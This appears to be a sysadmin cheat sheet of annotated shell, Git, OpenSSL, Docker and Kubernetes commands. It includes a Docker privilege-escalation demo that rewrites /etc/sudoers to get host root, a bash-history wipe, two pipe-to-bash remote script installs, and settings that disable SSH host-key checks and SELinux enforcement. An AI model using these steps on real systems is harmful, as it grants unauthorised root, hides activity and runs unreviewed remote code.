Delete history and exit bash
# Truncate the on-disk history file, clear the in-memory history, and
# leave the shell immediately so nothing is flushed back on exit.
cat /dev/null > ~/.bash_history && history -c && exit
Print all uncommented config file lines (without the empty ones)
# Print all uncommented, non-empty lines. 'grep -E' replaces the
# deprecated 'egrep' and reads the file directly (no useless cat).
grep -Ev '^#|^$' file.txt
Delete files older than 1 year
# Delete regular files not modified for more than a year.
# -type f skips directories, '+' batches the rm invocations, and
# '--' protects against file names that start with '-'.
find /var/log/httpd/ -type f -mtime +365 -exec rm -f -- {} +
Append multiple lines to file
# Append a here-doc to /etc/hosts. The unquoted EOF delimiter means any
# $variables in the body would be expanded (none are used here).
cat <<EOF >> /etc/hosts
10.135.77.134 node1
10.135.77.135 node2
10.135.77.177 node3
EOF
Append multiple lines to file as root
# Run the whole here-doc append inside a root shell: the redirection
# itself needs root, so a plain 'sudo cat >> /etc/hosts' would not work.
sudo bash -c 'cat <<EOF >> /etc/hosts
10.135.77.134 node1
10.135.77.135 node2
10.135.77.177 node3
EOF'
Search and replace pattern in file
# Replace every 'mon_host = ...' line in place (-i edits the file directly).
sed -i 's/mon_host = .*/mon_host = 8.8.8.8/g' ceph.conf
Search and replace pattern in file with input from STDIN
# Base64-encode the newline-stripped CA bundle and splice it into the
# YAML file: xargs substitutes the encoded string for every INSERTED
# token inside the sed replacement expression.
cat cacerts.pem | tr -d '\n' | base64 -w 0 | xargs --replace=INSERTED -- sed -i ./ansible-rancher/inventories/host_vars/cluster_rancher.yml -e 's/rke_rancher_tls_cacerts.*/rke_rancher_tls_cacerts: "INSERTED"/g'
Rsync files to remote host over SSH
# -a keep attributes, -v verbose, -z compress, -P progress + resumable
# transfers; -e selects the SSH identity used for the connection.
rsync -avzP -e "ssh -i /root/.ssh/id_rsa_my_ssh_pub_key" /opt/data/* <REMOTE_USER>@<REMOTE_IP>:/opt/data/
SSH via jumpserver in a single command
# Tunnel through the jump host with ProxyCommand + 'ssh -W'; host-key
# checks are disabled on both hops, and IdentitiesOnly forces exactly
# the given key. NOTE(review): on OpenSSH 7.3+ the simpler
# '-J <jumpserver-user>@<jumpserver-ip>' flag achieves the same thing.
ssh -i ~/.ssh/id_rsa_example_key \
-o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-o IdentitiesOnly=yes \
-o 'ProxyCommand=ssh -W %h:%p \
-i ~/.ssh/id_rsa_example_key \
-o StrictHostKeyChecking=no \
-o UserKnownHostsFile=/dev/null \
-o IdentitiesOnly=yes \
<jumpserver-user>@<jumpserver-ip>' \
<target-server-user>@<target-server-IP>
Count all files in the current directory and its subdirectories
# Counts one line per file; file names containing newlines would be
# over-counted.
find . -type f | wc -l
Print amount of open files per process (sorted)
# Count open file descriptors per process by listing /proc/<pid>/fd,
# sorted descending by FD count. All expansions are quoted so nothing
# can word-split or glob.
for pid in /proc/[0-9]*; do
  p=$(basename "$pid")
  printf "%4d FDs for PID %6d; command=%s\n" \
    "$(ls "$pid/fd" | wc -l)" "$p" "$(ps -p "$p" -o comm=)"
done | sort -nr
Bulletproof copy command (also takes care of permissions and file modes)
(cd /opt/<SOURCE_PATH>; tar -cf - .) | (cd /mnt/<DESTINATION_PATH>; tar -xpf -)
Set Executable Bit on Windows
# Mark the file executable in the Git index — useful on Windows, where
# the filesystem itself carries no executable bit.
git update-index --chmod=+x <filename.sh>
Git rebase (get the newest master commits into the feature branch)
# Get newest changes:
git fetch
# Start interactive rebase in feature branch:
git checkout my_awesome_feature
git rebase -i origin/master
# Manually resolve merge conflicts, then stage them; '-A' also stages
# dotfiles and deletions, which the shell glob '*' would miss:
git add -A
# Check if the latest master commit comes right before the first feature branch commit:
git log
# If the git log is correct, push the rebased branch. --force-with-lease
# refuses to overwrite commits someone else pushed in the meantime:
git push --force-with-lease origin my_awesome_feature
Change the last Git commit's timestamp to the current one
# --date sets the author date; GIT_COMMITTER_DATE sets the committer
# date — both must be refreshed to fully update the commit timestamp.
GIT_COMMITTER_DATE="$(date)" git commit --amend --no-edit --date "$(date)"
Change Git remote URL of the existing origin remote
# Show the current remotes, then point 'origin' at the new URL.
git remote -v
git remote set-url origin [email protected]:<new-remote-repo>.git
Convert Putty format SSH public key to OpenSSH format
# -i imports a key in non-OpenSSH (RFC 4716 / PuTTY) format and prints
# it in OpenSSH format on stdout.
ssh-keygen -i -f PuttyStyle_PublicKey.pub > OpenSSHStyle_PublicKey.pub
Run a command every X seconds
# watch re-runs the quoted command every X seconds and redraws its output.
watch -n X 'redis-cli info | grep connected_clients'
Get public IP from CLI
# icanhazip.com answers with the caller's public IP as plain text.
wget -qO - icanhazip.com
Adding new disk
# Create an LVM physical volume, volume group and logical volume on the
# new disk, format it, and mount it on the freshly created mountpoint.
pvcreate /dev/sdb
vgcreate vg1-nfs /dev/sdb
lvcreate -l 100%FREE -n data vg1-nfs
mkfs.ext4 /dev/vg1-nfs/data
mkdir /nfs
# Mount the new filesystem (add an /etc/fstab entry to make it permanent):
mount /dev/vg1-nfs/data /nfs
Generate self-signed certificate in single command
# 10-year self-signed certificate; -nodes leaves the key unencrypted.
# Modern clients ignore the CN for hostname checks, so a subjectAltName
# is added as well (requires OpenSSL 1.1.1+ for -addext).
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -days 3650 -subj "/C=CH/ST=Zurich/L=Zurich/O=Example Inc./OU=IT/CN=git.example.com" -addext "subjectAltName=DNS:git.example.com"
Generate CA & server cert, sign server cert with CA key
# Generate root CA cert and key
openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout ca.key -out ca.crt -days 3650 -subj "/C=CH/ST=Zurich/L=Zurich/O=Example Inc./OU=IT/CN=My Awesome Root CA"
# Generate server cert request and key (-days only applies with -x509,
# so it is omitted for the CSR)
openssl req -new -newkey rsa:4096 -sha256 -nodes -keyout tls.key -out tls.csr -subj "/C=CH/ST=Zurich/L=Zurich/O=Example Inc./OU=IT/CN=git.example.com"
# Sign server cert request with CA. 'x509 -req' drops CSR extensions,
# so the subjectAltName modern clients require is supplied via -extfile.
openssl x509 -req -in tls.csr -set_serial 1000 -CA ca.crt -CAkey ca.key -days 3650 -extfile <(printf 'subjectAltName=DNS:git.example.com') -out tls.crt
# Validate the signature
openssl verify -verbose -CAfile ca.crt tls.crt
Enable sudo access for 720 minutes without re-entering the password
# Extend the sudo password cache to 720 minutes.
# NOTE(review): editing /etc/sudoers with sed is risky — a syntax error
# locks sudo out entirely. Prefer 'visudo', or at least run 'visudo -c'
# immediately afterwards to validate the file.
sudo sed -i 's/Defaults.*env_reset$/Defaults env_reset, timestamp_timeout=720/g' /etc/sudoers
Show all OOM killed processes
# Search the kernel ring buffer (with human-readable timestamps, -T)
# for OOM-killer messages; 'grep -E' replaces the deprecated 'egrep'.
dmesg -T | grep -Ei 'killed process'
Small, manual load test using curl
# Fire 100 sequential requests (~10 req/s); -s silences progress and
# -o /dev/null discards the response body.
for i in {1..100}; do
curl -s -o /dev/null https://my-example-url.com
sleep 0.1
done
Check write speed of a disk (via mountpoint, without cache)
# oflag=dsync forces synchronous writes, bypassing the page cache so the
# result reflects real disk speed. Leaves a 1 GiB test file behind —
# delete /mnt/mountxy.img afterwards.
dd if=/dev/zero of=/mnt/mountxy.img bs=1G count=1 oflag=dsync
Check read speed of a disk (without cache)
# -t buffered read timing, -T cache read timing; --direct uses O_DIRECT
# to bypass the page cache. Needs root.
hdparm -tT --direct /dev/sda
Set restrictive permissions on Apache HTTPD DocumentRoot
# Hand the DocumentRoot to the apache user with read-only permissions:
# directories r-x for owner+group (0570), files r-- (0460), nothing for
# others.
cd /var/www/html/...
chown -R apache:apache .
find . -type d -exec chmod 0570 {} \;
find . -type f -exec chmod 0460 {} \;
# Check SELinux state, then switch to permissive mode for testing.
# NOTE(review): setenforce 0 weakens security — re-enable after testing.
sestatus
setenforce 0
sed -i --follow-symlinks 's/^SELINUX=.*/SELINUX=permissive/g' /etc/sysconfig/selinux && cat /etc/sysconfig/selinux
sestatus
Attention: Only works if the current user has the permission to run Docker containers!
# Privilege-escalation demo: bind-mount /etc/sudoers into a root
# container and edit it from inside (host file permissions do not apply
# to the container's root user).
docker run --rm -it -u root -v /etc/sudoers:/tmp/sudoers alpine /bin/sh
apk add --no-cache vim
vim /tmp/sudoers
# Add the following line after the last "%sudo" line (last one overrides all "%sudo"-lines before)
%sudo ALL=(ALL) NOPASSWD: ALL
# Exit vim using ":wq!"
# Exit the containers:
exit
# Get Root on the host system (no password prompt should appear):
sudo su
Building container images using buildah and traditional Dockerfiles:
# 'bud' (build-using-dockerfile) builds from the Dockerfile in the
# current directory; the result is then pushed to Docker Hub.
buildah login docker.io
buildah bud -t docker.io/<org_or_username>/<image_name>:<image_tag> .
buildah push docker.io/<org_or_username>/<image_name>:<image_tag>
# Create a Docker Buildx builder instance for multi-arch builds:
docker buildx create --name multiarch-builder --use --bootstrap
# Build the actual image and load it to the local Docker image cache
# (--load only supports a single platform per invocation):
docker buildx build --load --no-cache --tag <image-name>:1.0 .
# Build the actual image and push it to the quay.io image registry:
docker buildx build --push --platform linux/arm64,linux/amd64 --tag quay.io/<your-username-here>/<image-name>:latest .
E.g. sorted by most memory used:
# 'sed -u 1q' passes the header row through untouched; the remaining
# rows are sorted by column 4 (memory usage) in reverse human-numeric
# order (-h understands suffixes like MiB/GiB).
docker stats --no-stream --format "table {{.Name}}\t{{.Container}}\t{{.CPUPerc}}\t{{.MemUsage}}" | (sed -u 1q; sort -k 4 -rh)
# NOTE(review): piping a remote script straight into bash executes
# unreviewed code — download and inspect the script first.
wget -O - https://gist.githubusercontent.com/wdullaer/f1af16bd7e970389bad3/raw/install.sh| bash
see https://gist.github.com/wdullaer/f1af16bd7e970389bad3 for details
# Install Docker via the convenience script and enable it at boot.
curl -fsSL get.docker.com -o - | bash
systemctl enable docker
systemctl start docker
# docker-compose v1 via pip (EPEL provides python-pip on CentOS/RHEL 7).
# NOTE(review): dated — current installs use the 'docker compose' plugin.
yum install epel-release
yum update -y
yum install python-pip
pip install docker-compose
# Append a nightly (03:00) docker-gc run to the current user's crontab
# without clobbering the existing entries.
crontab -l | { cat; echo "0 3 * * * /bin/docker pull spotify/docker-gc:latest && /bin/docker run --rm -v /var/run/docker.sock:/var/run/docker.sock -v /etc:/etc:ro -e REMOVE_VOLUMES=1 spotify/docker-gc:latest"; } | crontab -
Note: Ensure docker's path is /bin/docker. If it's not, change the path in the statement above.
# Stop and remove ALL containers, then delete ALL local images.
docker stop $(docker ps -a -q)
docker rm $(docker ps -a -q)
docker rmi $(docker images -q)
Backup:
# Export an image to a tar archive, optionally gzip-compressed.
docker image save puzzle/keepalived:2.0.19 > puzzle_keepalived_2_0_19_backup.tar
# or
docker image save puzzle/keepalived:2.0.19 | gzip > puzzle_keepalived_2_0_19_backup.tar.gz
Restore:
# Import the image archive ('docker load' handles gzip transparently).
docker load -i puzzle_keepalived_2_0_19_backup.tar
# or
docker load -i puzzle_keepalived_2_0_19_backup.tar.gz
# daemon.json must be valid JSON, so overwrite it ('>') instead of
# appending ('>>') — appending to an existing file would corrupt it.
cat <<EOF > /etc/docker/daemon.json
{
"default-address-pools":
[
{"base":"10.0.0.0/8","size":27}
]
}
EOF
systemctl restart docker
Attention: All Docker containers, images, networks, volumes, running states, etc. are lost after the Docker storage driver and the data root are changed! If you do not want to lose any Docker related data, just copy it from the origin (by default /var/lib/docker) to the new partition (in this example /opt/docker) before you start the Docker daemon back again.
systemctl stop docker
pvcreate /dev/sdb
vgcreate vg1-docker /dev/sdb
lvcreate -l 100%FREE -n docker vg1-docker
# ftype=1 is required by the overlay2 storage driver
mkfs.xfs -n ftype=1 /dev/vg1-docker/docker
mkdir /opt/docker
cat <<EOF >> /etc/fstab
/dev/vg1-docker/docker /opt/docker xfs defaults 0 0
EOF
# Actually mount the new volume before Docker writes to /opt/docker:
mount /opt/docker
# daemon.json must be valid JSON, so overwrite it ('>') instead of
# appending ('>>') — appending to an existing file would corrupt it.
cat <<EOF > /etc/docker/daemon.json
{
"storage-driver": "overlay2",
"data-root": "/opt/docker/"
}
EOF
systemctl start docker
# Swarm with separate control-plane (--advertise-addr) and data-plane
# (--data-path-addr) addresses; the join token is printed by
# 'docker swarm init' on the master.
# On the master:
docker swarm init --advertise-addr <internal-master-IP> --data-path-addr <external-master-IP> --default-addr-pool 10.254.0.0/15 --default-addr-pool-mask-length 27
# On the worker1:
docker swarm join --advertise-addr <internal-worker1-IP> --data-path-addr <external-worker1-IP> --token <swarm-worker-join-token> <internal-master-IP>:2377
# On the workerX:
docker swarm join --advertise-addr <internal-workerX-IP> --data-path-addr <external-workerX-IP> --token <swarm-worker-join-token> <internal-master-IP>:2377
[user@node01 ~]$ docker service update --force --image dchevell/jira-software:8.2 jira
jira
overall progress: 1 out of 1 tasks
1/1: running [==================================================>]
verify: Service converged
[user@node01 ~]$ docker service inspect jira -f "{{.Spec.TaskTemplate.ContainerSpec.Image}}"
dchevell/jira-software:8.2@sha256:17e195aebfdb8e0606e87acf1d26b329af32e09e440b8f31ba2b233eaa093ada
Use --force when the tag of the new Docker image itself didn't change.
Get an overview
kubectl cluster-info
# NOTE(review): 'componentstatuses' is deprecated since Kubernetes 1.19.
kubectl get componentstatuses
kubectl api-versions
# Every resource, every namespace, with node placement and labels:
kubectl get all -A -o wide --show-labels=true
Explain fields of a specific resource (level)
# Walk the API schema down to a nested field and print its documentation.
kubectl explain deployments.spec.template.spec.containers
Filter YAML output using Go templates
# Secret .data values are base64-encoded, so decode them on output:
kubectl get -n my-ns secret my-awesome-secret -o go-template='{{index .data "cluster.conf" | base64decode }}'
# or (metadata fields are plain strings, NOT base64 — no base64decode here)
kubectl get -n my-ns secret my-awesome-secret -o go-template='{{.metadata.creationTimestamp}}'
Find remaining resources which cause Namespace deletion being stuck
# List every namespaced resource type, then show what of each is still
# left in the stuck namespace.
kubectl api-resources --verbs=list --namespaced -o name \
| xargs -n 1 kubectl get --show-kind --ignore-not-found -n <namespace>
Note: When a resource isn't properly deleted even when "force deletion" is used, check if the regarding resource has finalizers configured which can't complete. In such a case, edit the regarding resource and remove the finalizer YAML part.
Show all failing pods (helpful to see before cluster upgrades etc.)
# Hide fully-ready pods (n/n up to 6/6) and Completed ones; whatever is
# left is failing or not fully ready.
alias fpods='kubectl get pods -A -o wide | grep -v '\''1/1'\'' | grep -v '\''2/2'\'' | grep -v '\''3/3'\'' | grep -v '\''4/4'\'' | grep -v '\''5/5'\'' | grep -v '\''6/6'\'' | grep -v Completed'
Print all pods and their image (format: <namespace>/<pod>: <image>)
# Every jsonpath '{range ...}' needs a matching '{end}'; the former
# 'tr "\n" "\n"' was a no-op and has been dropped.
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.namespace}{"/"}{.metadata.name}{": "}{.spec.containers[*].image}{"\n"}{end}' | sort -u
Add a debug container to a pod (e.g. when the pod image has no userspace (sh, bash, etc.)). Only works on K8s 1.23+.
# Attach an ephemeral debug container sharing the target container's
# process namespace (requires Kubernetes 1.23+).
kubectl debug -it <pod-name> --image nicolaka/netshoot:latest --target <container-inside-pod>
Troubleshooting Pod running in hostNetwork
# 'k' is a common alias for kubectl; the override starts the throwaway
# pod directly in the host's network namespace.
k run -it --rm --image nicolaka/netshoot --overrides='{"spec": {"hostNetwork": true}}' tshoot -- /bin/bash
Delete all pods within the current Namespace which are not in the Running state
# NOTE(review): 'grep -v Running' also matches Succeeded/Completed pods,
# so those get deleted as well.
kubectl get pods --no-headers=true | grep -v Running | awk '{print $1}' | xargs kubectl delete pod
https://kubernetes.io/docs/concepts/workloads/pods/ephemeral-containers/
Show diff between Helm release revisions
# Side-by-side diff of the values used by two Helm release revisions,
# using process substitution to feed both into vimdiff.
vimdiff <(helm get values prometheus-operator --revision 14) <(helm get values prometheus-operator --revision 13)
Download all images from a Helm chart
# Get `yq_darwin_arm64` from https://github.com/mikefarah/yq
helm pull <repo>/<chart-name> --version <version>
# Render the chart and extract every 'image:' value it references:
helm template -f <my-helm-values>.yaml <chart-name>.tgz | ./yq_darwin_arm64 -Nr '[.. | select(has("image")).image]' | sed -ne '/^- / s/^- "\(.*\)"$/\1/p' | sort -u
# Define the IMAGES array with the images printed above:
IMAGES=(
quay.io/....
docker.io/library/...
)
# Pull all images (quoted expansions keep each image reference one word):
for IMAGE in "${IMAGES[@]}"; do
docker pull --platform x86_64 "$IMAGE"
# Alternatively, something like this should do the trick to directly mirror the images to a custom registry:
#skopeo copy --multi-arch all docker://"$IMAGE" docker://harbor.example.com/project/"$IMAGE"
done
- Minimize Docker image size:
- Demystifying Containers
- Container Networking:
- https://dustinspecker.com/posts/how-do-kubernetes-and-docker-create-ip-addresses/
- https://dustinspecker.com/posts/iptables-how-docker-publishes-ports/
- https://dustinspecker.com/posts/iptables-how-kubernetes-services-direct-traffic-to-pods/
- https://dustinspecker.com/posts/ipvs-how-kubernetes-services-direct-traffic-to-pods/
- Working with Kubernetes API blog post series:
- Get dynamic Docker image: https://nixery.dev/
- Network Policy Viewer: https://orca.tufin.io/netpol/
- Make private cluster publicly available (using inlets, https://docs.inlets.dev/#/): https://blog.alexellis.io/ingress-for-your-local-kubernetes-cluster/
- Buildah, Podman & Skopeo: https://www.redhat.com/en/blog/say-hello-buildah-podman-and-skopeo
Check the log of a process if the process itself does not deliver sufficient logs:
# Trace only write() syscalls of a running process and print up to 9999
# characters per string argument. '-e trace=write' is the correct filter
# syntax — a bare trailing 'write' is not a valid strace argument.
strace -p <PID-of-process> -s9999 -e trace=write
Note: <PID-of-process> may also be the PID of a process running inside a Docker container. This is very helpful for debugging dockerized processes that do not deliver sufficient logs.
Hint: Install perf via the linux-tools package. The perf version needs to match the kernel version!
Record data:
# Sample the process 100 times per second into perf.data.
perf_4.9 record -F 100 -p <PID>
View recorded usage data:
# Open an interactive report of the recorded perf.data.
perf_4.9 report
Permanently add ssh key to keychain
<details open>
<summary>Dropdown title</summary>
<pre> // <- this is optional
Very loooong text here
</pre>
</details>